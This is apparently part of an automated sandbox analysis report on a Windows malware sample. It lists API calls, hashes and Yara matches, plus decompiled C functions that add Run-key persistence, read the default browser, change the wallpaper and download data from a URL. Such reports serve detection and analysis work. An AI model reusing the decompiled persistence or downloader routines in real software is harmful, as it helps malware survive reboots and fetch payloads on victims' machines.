                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,z@,00000000), ref: 0040E8AC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8B7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8C1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000096), ref: 0040E8DE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$AddressHandleModuleProcSleep__aulldiv
                                                                                • String ID: z@
                                                                                • API String ID: 502185306-317290069
                                                                                • Opcode ID: 90e96f214da2dad705093cfe314cb979ca6e7dee5d1c7692eb7bae7d6327e244
                                                                                • Instruction ID: 66f006b43ec3188ac29da0c8503291dee518f3a81564da720cf043436550991c
                                                                                • Opcode Fuzzy Hash: 90e96f214da2dad705093cfe314cb979ca6e7dee5d1c7692eb7bae7d6327e244
                                                                                • Instruction Fuzzy Hash: E1318472C0010CEBDB01EBA1DD49EDEB778AB54305F00416AFA12A70D1EFB55B48CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
                                                                                				char _v20;
                                                                                				void* _t13;
                                                                                				void* _t15;
                                                                                				char* _t26;
                                                                                				void* _t27;
                                                                                				void* _t32;
                                                                                				void* _t35;
                                                                                
                                                                                				_t26 = "\"";
                                                                                				if(_a4 == 1) {
                                                                                					_t35 = _t27 - 0x10;
                                                                                					L0041416A();
                                                                                					L00414146();
                                                                                					_t3 =  &_a16; // 0x415a24
                                                                                					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);
                                                                                					_t27 = _t35 + 0x38;
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                                                                				}
                                                                                				if(_a8 == 1) {
                                                                                					_t32 = _t27 - 0x10;
                                                                                					L0041416A();
                                                                                					L00414146();
                                                                                					_t7 =  &_a16; // 0x415a24
                                                                                					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
                                                                                					_t27 = _t32 + 0x38;
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                                                                				}
                                                                                				if(_a12 == 1) {
                                                                                					L0041416A();
                                                                                					L00414146();
                                                                                					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                                                                					return _t15;
                                                                                				}
                                                                                				return _t13;
                                                                                			}











                                                                                APIs
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DA4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D84
                                                                                  • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                                                                  • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7D5
                                                                                  • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7E3
                                                                                  • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                                                                  • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B801
                                                                                  • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 0040B810
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DBE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DC8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DE8
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E02
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E0C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407E2C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                                                • String ID: $ZA$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                                                                • API String ID: 111787555-1962044633
                                                                                • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                                                                • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                                                                • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                                                                • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                                                                • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                                                                • API String ID: 2054586871-62392802
                                                                                • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                                                                • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                                                                • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                                                                • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                                                                  • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                                                                  • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                                                                  • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                                                                  • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,000197E8,?,?,0041225E,?), ref: 00412919
                                                                                  • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                                                                  • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                                                                  • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                                                                  • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                                                                  • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                                                                  • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                                                                • String ID: .exe$http\shell\open\command
                                                                                • API String ID: 2647146128-4091164470
                                                                                • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                                                                • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                                                                • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                                                                • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                                                                • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 2807017801-0
                                                                                • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                                                                • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                                                                • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                                                                • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00401EA7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                                                                • String ID:
                                                                                • API String ID: 3851886811-0
                                                                                • Opcode ID: 3033ba471139627a95a1ae9ed049b6a3ee367861473b18084aba16617f85b934
                                                                                • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                                                                • Opcode Fuzzy Hash: 3033ba471139627a95a1ae9ed049b6a3ee367861473b18084aba16617f85b934
                                                                                • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041343B
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B10,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041347F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416D58,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134BA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B18,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134F5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 00413537
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?), ref: 00413562
                                                                                • SystemParametersInfoW.USER32 ref: 00413580
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                • API String ID: 3561681748-3576401099
                                                                                • Opcode ID: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                                                                • Instruction ID: 9cbbbfad74e45987a2bd5f73a37c109ae42610d4aeaf5eddbb83fc0603d2e269
                                                                                • Opcode Fuzzy Hash: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                                                                • Instruction Fuzzy Hash: 5041A772B50604BBEB1076A59C47FEF393ED780B50F51006AF9116B2C1D7AA8AC446EF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
                                                                                				void* _v8;
                                                                                				char* _v12;
                                                                                				void* _v16;
                                                                                				void _v10016;
                                                                                				void* _t35;
                                                                                				void* _t36;
                                                                                				void* _t42;
                                                                                				void* _t44;
                                                                                				void* _t46;
                                                                                				unsigned int* _t55;
                                                                                				signed int _t57;
                                                                                				signed int _t58;
                                                                                				signed int _t64;
                                                                                				signed int _t74;
                                                                                				char* _t98;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				void* _t103;
                                                                                
                                                                                				E00413ED0(0x271c, __ecx);
                                                                                				_t55 = _a12;
                                                                                				_a15 = _a15 & 0x00000000;
                                                                                				_t98 = 0;
                                                                                				 *_a8 = 0;
                                                                                				 *_t55 = 0;
                                                                                				_t35 = InternetOpenA("user", 1, 0, 0, 0);
                                                                                				_v16 = _t35;
                                                                                				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
                                                                                				_v8 = _t36;
                                                                                				if(_t36 != 0) {
                                                                                					_a12 = 0;
                                                                                					_a4 = 0;
                                                                                					while(1) {
                                                                                						_t10 =  &_a12; // 0x415664
                                                                                						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
                                                                                						if(_t42 != 0 && _a12 <= _t98) {
                                                                                							break;
                                                                                						}
                                                                                						_t44 =  *_t55 + _a12;
                                                                                						_push(_t44);
                                                                                						L00413E84();
                                                                                						_t57 =  *_t55;
                                                                                						_t100 = _a4;
                                                                                						_t58 = _t57 >> 2;
                                                                                						_v12 = memcpy(_t44, _t100, _t58 << 2);
                                                                                						_push(_a4);
                                                                                						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
                                                                                						_t101 =  &_v10016;
                                                                                						_t64 = _a12 >> 2;
                                                                                						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
                                                                                						_t103 = _t103 + 0x30;
                                                                                						L00413EBE();
                                                                                						_a4 = _v12;
                                                                                						 *_t55 =  *_t55 + _a12;
                                                                                						_t98 = 0;
                                                                                					}
                                                                                					_push( *_t55);
                                                                                					L00413E84();
                                                                                					_t102 = _a4;
                                                                                					 *_a8 = _t42;
                                                                                					_t74 =  *_t55 >> 2;
                                                                                					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
                                                                                					_a15 = 1;
                                                                                				}
                                                                                				InternetCloseHandle(_v16);
                                                                                				InternetCloseHandle(_v8);
                                                                                				return _a15;
                                                                                			}























                                                                                APIs
                                                                                • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                                                                • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                                                                • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                                                                • InternetCloseHandle.WININET(?), ref: 00412652
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00412657
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                                                                • String ID: dVA$user
                                                                                • API String ID: 3314639739-756348157
